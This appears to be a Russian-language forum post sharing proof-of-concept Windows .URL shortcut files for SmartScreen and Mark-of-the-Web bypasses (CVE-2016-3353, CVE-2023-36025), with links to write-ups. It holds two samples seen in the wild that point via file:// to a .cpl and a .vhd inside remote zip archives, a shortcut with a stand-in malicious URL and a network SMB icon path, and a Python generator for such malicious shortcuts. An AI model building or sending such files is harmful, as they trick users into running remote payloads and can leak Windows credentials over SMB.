Security Update Guide - Microsoft Security Response Center
msrc.microsoft.com
Похожая cve-2016-3353 можно точно так же использовать exp.url -> archive.zip\test.hta
Analysis of MS16-104: .URL files Security Feature Bypass (CVE-2016-3353) - Quarkslab's blog
On September 13th, 2016 Microsoft released security bulletin MS16-104 [1], which addresses several vulnerabilities affecting Internet Explorer. One of those vulnerabilities is CVE-2016-3353, a security feature bypass bug in the way .URL files are handled. This security issue does not allow for...
blog.quarkslab.com
PoCs in the wild
sample1.url
Код:
[InternetShortcut]
IconIndex=38
HotKey=0
IDList=
URL=file://xxxxxxxx\scarica\config.zip\config.cpl
IconFile=C:\Windows\system32\SHELL32.dll
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9sample2.url
Код:
[InternetShortcut]
IconIndex=38
HotKey=0
IDList=
URL=file://xxxxxxxxx/scarica/gruppo.zip/gruppo.vhd
IconFile=C:\Windows\system32\SHELL32.dll
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9PoC - опубликованный исследователем
CVE-2023–36025: An In-Depth Analysis of Circumventing Windows SmartScreen Security
In the world of cybersecurity, the discovery of a vulnerability like CVE-2023-36025 in Windows SmartScreen is a significant event. This…
infosecwriteups.com
test.url
Код:
[InternetShortcut]
URL=malicious-website.com
IDList=
IconFile=\\\\\\\\192.168.1.100\\\\share\\\\icon.ico
IconIndex=1script.py
Python:
def create_malicious_url_file(filename, target_url, icon_path):
with open(filename, 'w') as file:
file.write('[InternetShortcut]\\\\n')
file.write(f'URL={target_url}\\\\n')
file.write('IDList=\\\\n')
file.write(f'IconFile={icon_path}\\\\n')
file.write('IconIndex=1\\\\n')
malicious_url = "<http://malicious-website.com>"
icon_network_path = "\\\\\\\\\\\\\\\\192.168.1.100\\\\\\\\share\\\\\\\\icon.ico"
create_malicious_url_file("malicious_link.url", malicious_url, icon_network_path)p.s. багу закрыли поэтому теперь выдаёт алерт